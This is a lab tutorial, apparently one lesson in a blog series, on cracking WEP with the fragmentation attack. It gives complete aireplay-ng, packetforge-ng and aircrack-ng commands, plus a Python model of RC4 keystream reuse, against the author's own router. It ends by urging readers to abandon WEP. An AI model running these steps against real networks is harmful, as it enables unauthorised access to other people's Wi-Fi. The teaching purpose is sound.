15 – WEP Fragmentation attack

Similar to the Chopchop attack carried out in the previous lesson, the fragmentation attack greatly speeds up the cracking process: it recovers a keystream (saved to an xor file), packetforge-ng uses that keystream to build arbitrary packets, and those packets are then injected into the wireless access point.

There is a great write up by Andrea Bittau which explains this attack in a lot more detail than I am going to here and you should give it a read as it is very informative.

Once again, like Chopchop, this attack relies on the pseudo-random keystream produced by RC4, referred to as the PRGA (pseudo-random generation algorithm) output. Aireplay-ng will automatically recover the first 8 bytes of keystream from a captured frame and use them to inject our arbitrary forged packets into the access point network.

This is also a great attack to run if there are no clients currently connected to the access point 🙂
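Why 8 bytes of keystream are enough to forge a packet: the example below (added here, not code from the original lesson or the aircrack-ng project) models WEP's RC4 keystream reuse in pure Python. Key, IV and frame bodies are constructed values; the LLC/SNAP header is the real known-plaintext prefix of a WEP data frame, and the ICV is omitted for brevity.

```python
# Added example, not from the original lesson: a pure-Python model of WEP's
# RC4 keystream reuse. It shows why the 8 PRGA bytes aireplay-ng writes to the
# .xor file are enough for packetforge-ng to build a packet the AP accepts.
# Constructed values only: key, IV and frame bodies below are made up.

def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key scheduling, then PRGA output of `length` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def wep_xor(iv: bytes, wep_key: bytes, data: bytes) -> bytes:
    """WEP seeds RC4 with IV||key; encrypt and decrypt are the same XOR (ICV omitted)."""
    ks = rc4_keystream(iv + wep_key, len(data))
    return bytes(d ^ k for d, k in zip(data, ks))

# Nearly every WEP data frame starts with this LLC/SNAP header, so the first
# 8 plaintext bytes are known to anyone sniffing (0x0806 = ARP ethertype).
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")

def recover_keystream(ciphertext: bytes, known_plaintext: bytes) -> bytes:
    """Stream-cipher known-plaintext step: keystream = C xor P."""
    return bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))

def forge(keystream: bytes, plaintext: bytes) -> bytes:
    """packetforge-ng's job: XOR a chosen body with the recovered keystream."""
    if len(plaintext) > len(keystream):
        raise ValueError("keystream too short: fragment or extend it first")
    return bytes(p ^ k for p, k in zip(plaintext, keystream))

def demo() -> tuple:
    wep_key, iv = bytes.fromhex("1337c0de42"), bytes.fromhex("010203")  # constructed
    observed = wep_xor(iv, wep_key, LLC_SNAP_ARP + bytes.fromhex("00010800"))
    ks = recover_keystream(observed, LLC_SNAP_ARP)      # the 8 bytes in the .xor file
    chosen = bytes.fromhex("aaaa030000000800")          # IP ethertype, never sent by victim
    forged = forge(ks, chosen)
    # The AP decrypts under the same IV and key and sees exactly our chosen bytes.
    return ks, wep_xor(iv, wep_key, forged)
```

The same keystream decrypts any frame sent under that IV, which is the property WPA2 and WPA3 were designed to remove; the only defence is not running WEP at all.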

Let’s get to it and have a closer look. First configure your router as follows:

[Figure 1 - Configure router]

Put your card into monitor mode:

[Figure 2 - Configure monitor mode]

Start airodump-ng:

airodump-ng mon0 -c 6 --bssid 2C:B0:5D:XX:XX:XX -w frag

“airodump-ng” to start airodump-ng
“mon0” is to set the interface of your wireless card
“-c” is to set your channel which is currently set to 1
“--bssid” is to set the MAC address of the access point
“-w” is to write this to a capture file called frag

[Figure 3 - airodump-ng start]

Next run aireplay-ng to do a fake authentication with the access point using your actual physical card MAC address:

aireplay-ng -1 0 -e test -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-1” is for a fake authentication
“0” is for re-association timing in seconds and may need to be adjusted
“-a” is followed by the MAC address of the access point
“-h” is the physical MAC address of your card
“mon0” is the interface of the wireless card

[Figure 4.1 - Fake authentication with the access point]

The output of airodump-ng currently looks like the following: no data packets are being sent or received on the network, and our wireless card is associated using the fake authentication seen above.

[Figure 4 - airodump-ng output]

Run the fragmentation attack:

aireplay-ng -5 -e test -b 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX mon0

“aireplay-ng” to start aireplay-ng
“-5” specifies that you want to run the fragmentation attack
“-e” is to specify the SSID of the access point which is test
“-b” is to set the MAC address of the access point
“-h” is your physical wireless card MAC address
“mon0” is the interface of your wireless card

[Figure 5 - Fragmentation attack start]

Successful output from the fragmentation attack looks like the following. As you can see we have obtained the keystream and it is saved in the xor file, which we can now use to create an arbitrary packet with packetforge-ng.

[Figure 6 - Fragmentation attack processed]

Now you can use packetforge-ng to craft a packet of your choosing, which is an ARP packet in this case, as in the Chopchop attack:

packetforge-ng -0 -a 2C:B0:5D:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y replay_dec.xor -w arp-request

“packetforge-ng” to start packetforge-ng
“-0” is to forge an ARP packet
“-a” is for specifying the access point MAC address
“-h” is to specify your wireless card MAC address
“-k” sets the destination IP (and optionally port), in this case the broadcast address 255.255.255.255
“-l” (a lower case ‘L’, to save confusion) sets the source IP (and optionally port), once again the broadcast address
“-y” is to use the xor file obtained from the fragmentation attack to forge the packet
“-w” is to write the forged packet to a file, which is called arp-request

[Figure 7 - Create ARP request with packetforge-ng]

Once you have your packet forged from the previous step you can inject it into the access point with the following aireplay-ng command:

aireplay-ng -2 -r arp-request mon0

“aireplay-ng” will start aireplay-ng
“-2” is to run an interactive packet replay
“-r” is to select the file from which to extract packets, which is arp-request here
“mon0” is the interface of your card to run this from

[Figure 8 - Inject forged arp-request]

Wait a few minutes to generate enough packets before running aircrack-ng; on the Raspberry Pi 2 at least, I noticed that starting it too early seems to freeze the injection process, which means restarting the whole process over again. After a few minutes you should see the data count has risen greatly; the more data packets seen here the better for the cracking process.

[Figure 9 - airodump-ng output]

Start aircrack-ng against the airodump-ng capture using the following:

aircrack-ng frag-01.cap

“aircrack-ng” starts aircrack-ng
“frag-01.cap” is the name of the capture file to run aircrack-ng against

As you can see we have obtained a huge number of IVs, so this should be quick and easy.

[Figure 10 - aircrack-ng starting]

Aircrack-ng success looks like the following:

[Figure 11 - aircrack-ng success]

Lesson learned:

I really find I am repeating myself now when it comes to WEP encryption and you can probably already hear me saying it: don’t use WEP! If you know somebody using it, help them out and teach them how to secure their network. Much like the Chopchop attack carried out in the previous lesson, this attack greatly increases the speed at which you can obtain and crack the WEP key: injecting our arbitrary ARP packets forged with packetforge-ng into the access point raises the volume of data packets on the network, which yields more IVs and speeds up the cracking process.

